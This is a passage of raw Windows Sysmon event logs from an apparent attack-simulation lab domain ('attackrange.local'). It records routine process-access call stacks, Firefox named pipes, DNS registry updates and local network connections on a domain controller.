21:50:44.234{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918139Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.234{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918138Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.233{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918137Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.233{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918136Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.233{896A638B-B8DD-6058-9202-00000000AE01}36324636C:\Windows\system32\csrss.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918135Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.233{896A638B-C9AE-6058-4C07-00000000AE01}34204308C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+4303b|C:\Program Files\Mozilla Firefox\firefox.exe+244f8|C:\Program Files\Mozilla Firefox\xul.dll+c12b3a|C:\Program Files\Mozilla Firefox\xul.dll+1122a14|C:\Program Files\Mozilla Firefox\xul.dll+1120ca2|C:\Program Files\Mozilla Firefox\xul.dll+112d46e|C:\Program Files\Mozilla Firefox\xul.dll+cb8604|C:\Program Files\Mozilla Firefox\xul.dll+4155f|C:\Program Files\Mozilla Firefox\xul.dll+403bd|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+cbe2e2|C:\Program Files\Mozilla Firefox\nss3.dll+f943a|C:\Program Files\Mozilla Firefox\nss3.dll+ecb31|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918134Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.215{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe86.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3420.150.1432204275\1742567184" -childID 21 -isForBrowser -prefsHandle 6180 -prefMapHandle 9428 -prefsLen 17489 -prefMapSize 228338 -parentBuildID 20210310152336 -appdir "C:\Program Files\Mozilla Firefox\browser" - 3420 "\\.\pipe\gecko-crash-server-pipe.3420" 5396 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2LowMD5=5B68C17D571DCAB4E2FA29EE0DBEC5CB,SHA256=929A1A95196BD1165433CEBF4152A2FAB6EFC3D2EB298E08F8229C5B22AE8DC9,IMPHASH=8FBF1ADBCE9C978414F8FE0722EC7401{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 17141700x80000000000000005918133Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:44.204{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.150.143220427C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000638652Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:45.319{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C33C6923293AEFB6EC2B38173521BAF,SHA256=726B9208795972855FC8A67BB18F1B9358FDCFF8619EC2E7EFAF6D72374FB291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918231Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.969{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=258DB28B030BD2E7046022CED28D06FA,SHA256=25A3547E561705B139DF2567BB9479B51A1341175D3DA5CBA10B121915138559,IMPHASH=00000000000000000000000000000000falsetrue 18141800x80000000000000005918230Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.747{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.5604.4.66686091C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918229Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.747{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.4.66686091C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918228Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918227Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918226Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.489{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918225Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.489{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918224Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.547{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local52484- 354300x80000000000000005918223Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.939{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9890:924:8fad:ffff-61429-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000005918222Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.939{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local61429-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000005918221Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.934{896A638B-B5CA-6058-1200-00000000AE01}400C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-792.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.us-west-2.compute.internal67bootps 10341000x80000000000000005918220Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.283{896A638B-C9AE-6058-4C07-00000000AE01}34207004C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+1108cf1|C:\Program Files\Mozilla Firefox\xul.dll+112513c|C:\Program Files\Mozilla Firefox\xul.dll+1231b37|C:\Program Files\Mozilla Firefox\xul.dll+222371|C:\Program Files\Mozilla Firefox\xul.dll+1132aab|C:\Program Files\Mozilla Firefox\xul.dll+41d97|C:\Program Files\Mozilla Firefox\xul.dll+402f2|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+cbe2e2|C:\Program Files\Mozilla Firefox\nss3.dll+f943a|C:\Program Files\Mozilla Firefox\nss3.dll+ecb31|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918219Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.276{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.156.54789522C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918218Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.276{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.155.142773008C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918217Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.275{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.154.206825202C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918216Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.275{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.153.80798741C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918215Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.275{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.152.119876033C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918214Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.275{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.151.208923900C:\Program Files\Mozilla Firefox\firefox.exe 13241300x80000000000000005918213Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000005918212Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000005918211Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000005918210Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\FlagsDWORD (0x00000002) 13241300x80000000000000005918209Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\TtlDWORD (0x000004b0) 13241300x80000000000000005918208Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\SentPriUpdateToIpBinary Data 13241300x80000000000000005918207Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\SentUpdateToIpBinary Data 13241300x80000000000000005918206Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\DnsServersBinary Data 13241300x80000000000000005918205Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\HostAddrsBinary Data 13241300x80000000000000005918204Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\PrimaryDomainNameattackrange.local 13241300x80000000000000005918203Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\AdapterDomainName(Empty) 13241300x80000000000000005918202Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.271{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\Hostnamewin-dc-792 18141800x80000000000000005918201Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.269{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.5604.3.45200256C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918200Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.269{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.3.45200256C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918199Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.266{896A638B-B5CA-6058-1300-00000000AE01}3881712C:\Windows\system32\svchost.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918198Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.265{896A638B-B5CA-6058-1300-00000000AE01}3881712C:\Windows\system32\svchost.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918197Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.263{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000005918196Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-SetValue2021-03-24 21:50:45.260{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{701EA7B4-22EA-4795-8B10-1F913BF6623B}\RegisteredSinceBootDWORD (0x00000001) 18141800x80000000000000005918195Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.253{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.5604.2.120083096C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918194Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.253{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.2.120083096C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918193Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.253{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.5604.1.214376525C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918192Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.253{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.1.214376525C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918191Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.252{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.0.114869681C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918190Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.252{896A638B-B434-605B-9169-00000000AE01}5604\chrome.5604.0.114869681C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918189Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.251{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla 